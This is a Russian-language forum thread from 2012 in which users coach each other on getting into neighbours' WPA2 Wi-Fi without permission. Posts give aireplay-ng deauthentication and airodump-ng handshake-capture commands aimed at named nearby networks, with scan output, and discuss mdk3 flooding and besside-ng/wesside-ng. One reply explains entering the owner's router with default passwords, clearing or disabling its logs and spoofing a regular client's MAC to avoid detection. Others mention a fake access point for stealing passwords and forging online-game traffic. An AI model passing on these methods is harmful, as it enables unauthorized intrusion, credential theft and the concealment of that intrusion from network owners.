Вопрос, конечно, интересный =) впринципе, всё зависит от того, насколько хозяин точки доступа не желает делиться интернетом, насколько владеет компьютером, так сказать, и насколько далеко у него зашла в своём прогрессе паранойя =) Ну а если по существу, то самый важный совет - не использовать "тяжёлые" сетевые приложения, забирающие на себя канал, в то время, как на точке висит пользователь. Просто посиди пару дней/ночей, и понаблюдай, когда, в основном, через точку идёт трафик, и не загружай канал в это время. Плюс периодически подчищай логи на точке (как правило, пользователи достаточно ленивы что-то менять в настройках, поэтому вход в админку точки не представляет сложностей. К примеру, если ты подключилась к точке, и видишь, что твой IP - 192.168.1.28, то, скорее всего, адрес точки - 192.168.1.1. Вводишь, собсно, "192.168.1.1" (без кавычек) в адресную строку браузера, видишь перед собой окно приветствия. Ввводишь требуемые данные (как правило, по окну приветствия можно определить если не модель, то уж фирму-производителя роутера точно. Идёшь к дяде гуглу, и ишешь "стандартные пароли к учётной записи администратора роутера <имярек>"), а дальше немножко фантазии, и, например, у ZyXEL P660HTW2 искомые нами логи располагаются в Maintance -> Logs (неожиданно, правда?). Жмём clear logs, и нас вроде бы и никогда не было... На соседней вкладочке Log Settings можно вообще выключить ведение логов. Вот, по сути, и всё, что так сходу на ум пришло. Ах да, делать чистку логов лучше всего под МАСом клиента, который частенько висит на точке, ибо на некоторых роутерах отключить логи не представляется возможным, и очистка логов пишется первой записью в новый лог-файл... К сожалению, если хозяин точки параноик, и каждые 10 минут залазиет на страничку со списком подключенных клиентов, то тут хоть роутер ему перезагрузи - один фиг увидит "левого" клиента на точке... Так что все эти советы - весьма относительны =) P.S. Прошу прощения за некий сумбур.
Благодарю за ответ ! Подскажите еще, ни как HandsHake поймать не могу 8 точек и не на одной поймать не могу. самое интересное если пробую свою точку поймать HandsHake все ловится на ура в чем может быть проблема ? делаю все эти команды Code: aireplay-ng -0 100 -a 84:C9:B2:5A:05:42 non0 - это если нет клиента STATION aireplay-ng -0 50 -a 84:C9:B2:5A:05:42 -c 0C:EE:E6:D8:B7:8F mon-0 - это если на точке есть клиент STATION Code: CH 2 ][ Elapsed: 18 mins ][ 2012-06-06 00:26 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 84:C9:B2:5A:05:42 -72 58 7957 1216 4 2 54e. WPA2 CCMP PSK mic-1624 BSSID STATION PWR Rate Lost Packets Probes 84:C9:B2:5A:05:42 0C:EE:E6:D8:B7:8F -73 0 - 1 0 6719 mic-1624
Ну, во-первых, если на точке клиента нет, то пытаться поймать хэндшейк - дело гиблое - всё равно, что с кодовым замком разговаривать, надеясь, что он пароль подскажет)) На точке должен быть клиент. В одном окне открываем airodump-ng (для пары "точка-клиент", которую ты описал, команды такие): Code: airodump-ng -c 2 --bssid 84:C9:B2:5A:05:42 -w mic-1624 mon0 В другом окне терминала при подключенном клиенте пишем-с: Code: aireplay-ng -a 84:C9:B2:5A:05:42 -c 0C:EE:E6:D8:B7:8F --deauth 1 mon0 Впринципе, с учётом уровня сигнала, которые ты привёл, даже один пакет деавторизации должен вызвать драматические последствия. Для начала, для всех остальных точек посмотри на уровень сигнала и точки, и клиента. Будет один или другой сигнал низкий - шанс поймать пакет рукопожатия резко падает. Попробуй ноут или антенну адаптера банально повертеть в пространстве, порой помогает. Не получится с такими командами - пиши, будем дальше думать, в чём проблема.
вот мои точки которые ловятся а так и должно быть PWR все с минусами ? Code: CH 5 ][ Elapsed: 44 s ][ 2012-06-06 00:05 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID A0:21:B7:B6:32:B6 -1 0 14 0 118 -1 WPA <length: 0> 84:C9:B2:5A:05:42 -66 9 0 0 2 54e. WPA2 CCMP PSK mic-1624 14:D6:4D:CD:96:70 -67 32 0 0 8 54e. WPA2 CCMP PSK mic-2450 A0:21:B7:B6:34:80 -68 11 0 0 1 54e. WPA2 CCMP PSK WiFi-Dom.ru-6249 F4:6D:04:7D:3E:20 -77 21 0 0 6 54 WPA2 CCMP PSK mic-8656 E0:46:9A:5F:63:D9 -76 22 0 0 1 54e. WPA2 CCMP PSK WiFi-DOM.RU-4993 00:15:6D:3E:F2:D9 -80 5 0 0 7 54 . OPN <length: 0> F4:EC:38:B7:D3:10 -83 5 0 0 7 54e. WPA2 CCMP PSK <length: 0> A0:21:B7:B6:35:1A -84 4 0 0 3 54e. WPA2 CCMP PSK WiFi-Dom.ru-0454 F0:7D:68:9D:3C:74 -84 6 0 0 6 54e. WPA2 CCMP PSK dlink2 F4:EC:38:A5:6E:12 -87 6 0 0 4 54e. WPA2 CCMP PSK Eat Street F8:D1:11:AD:AB:38 -87 7 0 0 11 54e. WPA2 CCMP PSK TP-LINK F0:7D:68:81:C0:6C -88 8 0 0 13 54e. WPA2 CCMP PSK mic-1289 1C:BD:B9:91:C6:F6 -88 10 0 0 13 54e. WPA2 CCMP PSK mic-1261 84:C9:B2:84:7F:80 -89 8 0 0 11 54e WPA2 TKIP PSK DIR-28 FC:75:16:A6:C6:F8 -90 4 0 0 11 54e WPA2 TKIP PSK mic-1187 ^C root@bt:~# мой WI-FI адаптер http://www.tp-linkru.com/products/details/?categoryid=243&model=TL-WN722NC для этого я делаю следующее правильно это или нет ? МDK3 там пишу mdk3 mon0 a –a(мак точки) ENTER. Это мощная программа отключит всех кто подключен к этой точке пользуйтесь осторожно и короткое время,это заставит их переподключится и у вас появится возможность поймать HANDSHAKE.
Да, мощность идёт с минусом, "это - норма"©. Попробуй расшатать одну из первых пяти (mic-1624, mic-2450, WiFi-Dom.ru-6249, mic-8656, WiFi-DOM.RU-4993). Во всяком случае, до точки ты должен достучаться с таким уровнем сигнала. До половины оставшихся тоже достучишься, а вот до их клиентов - не факт... По поводу mdk3 - ну это, конечно, на вкус и цвет, но пытаться положить точку ради переподключения... Проще, как я уже писал, aireplay-ng использовать для деассоциации клиента и точки =) Просто то, что ты делаешь с помощью mdk3, лучше подходит для других целей. Например, ты сделал фальшивую точку, чтобы, скажем, перехватить какие-то пароли пользователей. Для этого тебе требуется вывести из строя настоящую точку, чтобы переключились люди на твою. Вот тогда-то как раз
а вот эта команда Code: aireplay-ng -a 84:C9:B2:5A:05:42 -c 0C:EE:E6:D8:B7:8F --deauth 1 mon0 она деавторизует клиентов если их нет на точке ? например если эти поля все пустые введя выше команду можно идти спать и если кто то включит например комп то у меня появится HandsHake ? Code: BSSID STATION PWR Rate Lost Packets Probes такое ощущение что все на точках сидят по витой паре от роутера по воздуху ни кого нет, почти на всех точках даже днем нету STATION
Нет, она действенна только для подключенных клиентов. Если я правильно понял, то ты хочешь "автоматизировать процесс", оставив включенным мдк3, чтобы как только клиент попытается к точке подключиться, его тут же отрубило, и он попробовал снова и снова, пока у тебя не окажется ХШ. Если так, вынужден разочаровать: команда "а" в мдк3 перегружает точку несуществующими клиентами, и она просто-напросто не функционирует. То бишь, поймать часть хэндшейка, которая идёт от клиента на точку, ты можешь, а вот вторую часть (от точки клиенту) - нет. С одним-единственным пакетом делать нечео))) Так что единственный способ получить хэндшейк - ждать нормального подключения клиента к точке. Либо инициировать переподключение уже подключенного клиента. Так что сиди в засаде, жди, когда клиент подключится к точке, чтобы метким выстрелом аиреплеея отрубить его от точки, и получить вожделенный пакетик))
если я правильно понял, нельзя оставить на ночь комп включенный и на утро словить HandsHake ? а если оставить на ночь включенный airodump-ng без клиентов STATION, можно будет поймать HandsHake при подключении клиента ? я понимаю, если STATION пустая то значит все клиенты отключены и при включении компа сразу должно словиться HandsHake а вот это что за шифр OPN, у меня написано без шифрования и ключа а подключиться не могу к этой точке ? Code: 00:15:6D:3E:F2:D9 -80 5 0 0 7 54 . OPN <length: 0>
Ну, теоретически можно =) просто не всегда удаётся подобраться настолько близко к точке и клиенту, чтобы сразу слышать все пакеты.. А один "выпавший" пакет грозит кривым хэндшейком... Так что попробовать можно, но результат не гарантируется. Пробуй =) просто у меня, например, поймать ХШ при подключении компа к точке доступа получалось поймать от силы пару раз, всё, опять же, зависит от уровня сигнала. OPN - открытая сеть, только <length: 0> говорит о том, что она не вещает в эфир своё имя (скрытая, короче). Либо жди, когда к ней кто-то подцепится - клиент при подключении в пакетах "засветит" имя точки, либо всё тем же mdk3 попробуй bruteforce имени точки доступа)))
morgan-id что бы оставить комп ловить хендшей юзай: Code: besside-ng mon0 она сама все сделает, когда будет клиент.
не забудь вставить ключ -w что бы писал в лог файл для дальнейшего ковыряния, примерно так Code: besside-ng -w logfail mon0 где *logfail* это имя .cap файла в который будут сохраняться твои хендшейки.
у меня почему то ошибка пишу в консоле Code: root@bt:~# besside-ng -w logfail mon0 No command 'besside-ng' found, did you mean: Command 'wesside-ng' from package 'aircrack-ng' (universe) besside-ng: command not found root@bt:~# Code: root@bt:~# besside-ng mon0 No command 'besside-ng' found, did you mean: Command 'wesside-ng' from package 'aircrack-ng' (universe) besside-ng: command not found root@bt:~# вроде бы уровень сигнала хорошие Code: CH 11 ][ Elapsed: 4 mins ][ 2012-06-06 14:49 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID F8:D1:11:AD:AB:38 -85 100 2310 678 1 11 54e. WPA2 CCMP PSK TP-LINK BSSID STATION PWR Rate Lost Packets Probes F8:D1:11:AD:AB:38 00:07:AB:81:4F:9F -84 0 -11 0 164 TP-LINK F8:D1:11:AD:AB:38 DC:71:44:11:D7:6E -85 0 - 1e 0 41 а HandsHake не хочет ловить а может быть так что от меня до точки хороший сигнал идет а от самого клиента до меня слабый сигнал и не ловится поэтому HandsHake, я же правильно понял от клиента сигнал слабый то я не поймаю HandsHake ? и можно с помощью чего ни будь проверить мощьность от клиета до моего адаптера ?
Система жалуется на отсутствие пакета besside-ng, и намекает, что, может быть, ты имел ввиду wesside-ng? Собственно, правильно намекает. пиши wesside-ng mon0, и должно быть счастье)
а это не ошибки ? Code: root@bt:~# wesside-ng -w logfail mon0 wesside-ng: invalid option -- 'w' Wesside-ng 1.0 - (C) 2007, 2008, 2009 Andrea Bittau http://www.aircrack-ng.org Usage: wesside-ng <options> Options: -h : This help screen -i <iface> : Interface to use (mandatory) -m <my ip> : My IP address -n <net ip> : Network IP address -a <mymac> : Source MAC Address -c : Do not crack the key -p <min prga> : Minimum bytes of PRGA to gather -v <victim mac> : Victim BSSID -t <threshold> : Cracking threshold -f <max chan> : Highest scanned chan (default: 11) -k <txnum> : Ignore acks and tx txnum times root@bt:~# Code: root@bt:~# wesside-ng mon0 Interface IdidNotSpecifyAnInterface: ioctl(SIOCGIFINDEX) failed: No such device wesside-ng: wi_open(IdidNotSpecifyAnInterface): No such device root@bt:~#
переведен Code: root@bt:~# airmon-ng Interface Chipset Driver wlan0 Atheros ath9k - [phy1] root@bt:~# airmon-ng start wlan0 Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 1075 dhclient3 3064 dhclient3 Process with PID 3025 (ifup) is running on interface wlan0 Process with PID 3064 (dhclient3) is running on interface wlan0 Interface Chipset Driver wlan0 Atheros ath9k - [phy1] (monitor mode enabled on mon0) root@bt:~# airodump-ng mon0 CH 9 ][ Elapsed: 12 s ][ 2012-06-06 17:08 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 14:D6:4D:CD:96:70 -62 14 0 0 8 54e. WPA2 CCMP PSK mic-2450 34:08:04:D3:0B:6E -70 3 0 0 1 54e. WPA2 CCMP PSK dlink-45 E0:46:9A:5F:63:D9 -73 8 2 0 1 54e. WPA2 CCMP PSK WiFi-DOM.RU-4993 84:C9:B2:6D:93:8F -74 8 0 0 2 54e. WPA2 CCMP PSK dlink38182 A0:21:B7:B6:34:80 -74 11 0 0 1 54e. WPA2 CCMP PSK WiFi-Dom.ru-6249 F0:7D:68:9D:3C:74 -75 2 0 0 6 54e. WPA2 CCMP PSK dlink2 84:C9:B2:5A:05:42 -75 5 0 0 2 54e. WPA2 CCMP PSK mic-1624 F4:6D:04:7D:3E:20 -76 8 1 0 6 54 WPA2 CCMP PSK mic-8656 00:15:6D:3E:F2:D9 -78 5 8 0 7 54 . OPN <length: 0> 40:4A:03:B4:BA:42 -80 4 0 0 1 54 . WPA TKIP PSK Marusya F8:D1:11:AD:AB:38 -82 5 0 0 11 54e. WPA2 CCMP PSK TP-LINK 02:0C:42:61:1E:25 -82 4 0 0 5 54 . OPN WiFi.Magnitka 02:0C:42:61:1E:26 -82 5 0 0 5 54 . WPA2 CCMP PSK mek-tev2-s2 00:0C:42:61:1E:25 -82 5 1 0 5 54 . WPA2 CCMP PSK tevosyana-s2 F4:EC:38:A5:6E:12 -83 2 0 0 4 54e. WPA2 CCMP PSK Eat Street 00:0C:42:61:1D:AC -85 2 0 0 1 54 . WPA2 CCMP PSK tevosyana-s1 02:0C:42:61:1D:AD -86 1 0 0 1 54 . WPA2 CCMP PSK mek-tev2-s1 02:0C:42:61:1D:AC -87 1 0 0 1 54 . OPN WiFi.Magnitka FC:75:16:A6:C6:F8 -88 3 0 0 11 54e WPA2 TKIP PSK mic-1187 ^C root@bt:~# [COLOR=White]wesside-ng mon0 Interface IdidNotSpecifyAnInterface: ioctl(SIOCGIFINDEX) failed: No such device wesside-ng: wi_open(IdidNotSpecifyAnInterface): No such device[/COLOR] root@bt:~#
вопрос вопрос не много не по теме хотя как посмотреть. вообщем есть игра lords & knights для андройд. игра онлайн, играю через вай фай. нужно перехватить пакеты. пробывал вайфайфивер он хватает всепакеты. а как отфильтровать пакеты так чтоб были ток от этой игры?? ну и в добавок вопрос пакеты естественно зашифрованны - как расшифровать и подменить пакеты для получения ресурсов?? как отправить их на срв игры и может есть лучше программа для этих целей???
вопрос по теме анонимности через соседский Вай-фай, где и какая информация сохраняется о моем прибывании ONLINE в сети? и сохраняется ли какая-то информация после?? кто знает? заранее благодарен)
